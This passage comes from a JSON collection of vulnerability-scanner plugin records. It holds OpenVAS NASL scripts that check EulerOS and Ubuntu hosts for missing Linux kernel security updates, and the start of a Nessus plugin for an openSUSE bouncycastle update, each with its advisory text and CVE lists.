isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-06T18:52:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2019-14763", "CVE-2019-15218", "CVE-2018-13053", "CVE-2019-15090", "CVE-2019-3900", "CVE-2018-14610", "CVE-2018-13096", "CVE-2019-0136", "CVE-2018-13098", "CVE-2019-14284", "CVE-2019-12984", "CVE-2019-10639", "CVE-2018-20784", "CVE-2019-15216", "CVE-2018-13100", "CVE-2019-15211", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2019-11085", "CVE-2018-13099", "CVE-2019-13272", "CVE-2019-9506", "CVE-2019-15215", "CVE-2019-13631", "CVE-2018-16862", "CVE-2019-11884", "CVE-2019-10207", "CVE-2019-15220", "CVE-2019-11810", "CVE-2019-11833", "CVE-2019-15212", "CVE-2019-11599", "CVE-2019-15221", "CVE-2018-14614", "CVE-2019-10638", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2019-3701", "CVE-2019-15292", "CVE-2019-11487", "CVE-2018-14612", "CVE-2019-2024", "CVE-2019-11815", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-15214", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-3819", "CVE-2018-19985", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613", "CVE-2019-14283"], "description": "The remote host is missing an update for the ", "modified": "2019-09-05T00:00:00", "published": "2019-09-03T00:00:00", "id": "OPENVAS:1361412562310844159", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844159", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-4118-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844159\");\n script_version(\"2019-09-05T09:53:24+0000\");\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-20784\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-0136\", \"CVE-2019-10126\", \"CVE-2019-10207\", \"CVE-2019-10638\", \"CVE-2019-10639\", \"CVE-2019-11085\", \"CVE-2019-11487\", \"CVE-2019-11599\", \"CVE-2019-11810\", \"CVE-2019-11815\", \"CVE-2019-11833\", \"CVE-2019-11884\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-13631\", \"CVE-2019-14283\", \"CVE-2019-14284\", \"CVE-2019-14763\", \"CVE-2019-15090\", \"CVE-2019-15211\", \"CVE-2019-15212\", \"CVE-2019-15214\", \"CVE-2019-15215\", \"CVE-2019-15220\", \"CVE-2019-15292\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\", \"CVE-2019-3900\", \"CVE-2019-9506\", \"CVE-2018-20511\", \"CVE-2019-15216\", \"CVE-2019-15218\", \"CVE-2019-15221\", \"CVE-2019-3701\", \"CVE-2019-3819\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-05 09:53:24 +0000 (Thu, 05 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-03 02:02:11 +0000 (Tue, 03 Sep 2019)\");\n script_name(\"Ubuntu Update for linux-aws USN-4118-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4118-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-September/005096.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the USN-4118-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the alarmtimer implementation in the Linux kernel\ncontained an integer overflow vulnerability. A local attacker could use\nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use this\nto construct a malicious XFS image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the Linux\nkernel did not properly validate metadata. An attacker could use this to\nconstruct a malicious f2fs image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13096, CVE-2018-13097, CVE-2018-13098,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14615,\nCVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system implementation\nin the Linux kernel did not properly validate metadata. An attacker could\nuse this to construct a malicious btrfs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-14609, CVE-2018-14610,\nCVE-2018-14611, CVE-2018-14612, CVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some situations.\nAn attacker could use this to construct a malicious HFS+ image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem\nof the Linux kernel did not properly initialize new files in some\nsituations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed driver\nin the Linux kernel did not properly validate metadata received from the\ndevice. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux\nkernel did not properly handle size checks when handling an extra USB\ndescriptor. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could triggered in the CFS\nLinux kernel process scheduler. A local attacker could possibly use this to\ncause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possi ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux-aws' package(s) on Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1047-aws\", ver:\"4.15.0-1047.49\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.15.0.1047.46\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1047-aws\", ver:\"4.15.0-1047.49~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-aws-hwe\", ver:\"4.15.0.1047.47\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-15T14:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "description": "The remote host is missing an update for the ", "modified": "2019-08-14T00:00:00", "published": "2019-08-14T00:00:00", "id": "OPENVAS:1361412562310844133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844133", "type": "openvas", "title": "Ubuntu Update for linux USN-4094-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844133\");\n script_version(\"2019-08-14T07:16:43+0000\");\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13097\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14614\", \"CVE-2018-14616\", \"CVE-2018-13096\", \"CVE-2018-13098\", \"CVE-2018-14615\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14609\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-20169\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-10126\", \"CVE-2019-1125\", \"CVE-2019-12614\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\", \"CVE-2018-20511\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-14 07:16:43 +0000 (Wed, 14 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-14 02:02:14 +0000 (Wed, 14 Aug 2019)\");\n script_name(\"Ubuntu Update for linux USN-4094-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4094-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-August/005063.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-4094-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the alarmtimer implementation in the Linux kernel\ncontained an integer overflow vulnerability. A local attacker could use\nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use this\nto construct a malicious XFS image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13093)\n\nThe f2fs file system implementation in the Linux kernel did not properly\nvalidate metadata. An attacker could use this to construct a malicious\nf2fs image that, when mounted, could cause a denial of service (system crash).\n(CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nbtrfs file system implementation in the Linux kernel did not\nproperly validate metadata. An attacker could use this to construct\na malicious btrfs image that, when mounted, could cause a denial of service\n(system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some situations.\nAn attacker could use this to construct a malicious HFS+ image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem\nof the Linux kernel did not properly initialize new files in some\nsituations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux\nkernel did not properly handle size checks when handling an extra USB\ndescriptor. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in\nthe Linux kernel did not properly validate elliptic curve parameters during\nDiffie-Hellman key exchange in some situations. An attacker could use this\nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux' package(s) on Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-oracle\", ver:\"4.15.0-1021.23\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1040-gcp\", ver:\"4.15.0-1040.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1040-gke\", ver:\"4.15.0-1040.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1042-kvm\", ver:\"4.15.0-1042.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1043-raspi2\", ver:\"4.15.0-1043.46\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1050-oem\", ver:\"4.15.0-1050.57\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1060-snapdragon\", ver:\"4.15.0-1060.66\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic\", ver:\"4.15.0-58.64\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic-lpae\", ver:\"4.15.0-58.64\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-lowlatency\", ver:\"4.15.0-58.64\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1040.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1040.43\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke-4.15\", ver:\"4.15.0.1040.43\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.15.0.1042.42\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.1050.54\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oracle\", ver:\"4.15.0.1021.24\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.15.0.1043.41\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.15.0.1060.63\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"4.15.0.58.60\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-oracle\", ver:\"4.15.0-1021.23~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1040-gcp\", ver:\"4.15.0-1040.42~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-1055-azure\", ver:\"4.15.0-1055.60\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic\", ver:\"4.15.0-58.64~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-generic-lpae\", ver:\"4.15.0-58.64~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.15.0-58-lowlatency\", ver:\"4.15.0-58.64~16.04.1\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.15.0.1055.58\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1040.54\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1040.54\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-oracle\", ver:\"4.15.0.1021.15\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual-hwe-16.04\", ver:\"4.15.0.58.79\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-05-08T19:32:22", "description": "This update for bouncycastle fixes the following issues :\n\nVersion update to 1.60 :\n\n - CVE-2018-1000613: Use of Externally-ControlledInput to\n Select Classes or Code (boo#1100694)\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html\n\nVersion update to 1.59 :\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-04T00:00:00", "title": "openSUSE Security Update : bouncycastle (openSUSE-2020-607)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000613", "CVE-2017-13098"], "modified": "2020-05-04T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc"], "id": "OPENSUSE-2020-607.NASL", "href": "https://www.tenable.com/plugins/nessus/136317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-607.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136317);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\"CVE-2017-13098\", \"CVE-2018-1000613\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2020-607)\");\n script_summary(english:\"Check for the openSUSE-2020-607 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bouncycastle fixes the following issues :\n\nVersion update to 1.60 :\n\n - CVE-2018-1000613: Use of Externally-ControlledInput to\n Select Classes or Code (boo#1100694)\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html\n\nVersion update to 1.59 :\n\n - CVE-2017-13098: Fix against Bleichenbacher oracle when\n not using the lightweight APIs (boo#1072697).\n\n - Release notes:\n http://www.bouncycastle.org/releasenotes.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bouncycastle.org/releasenotes.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1072697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100694\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif 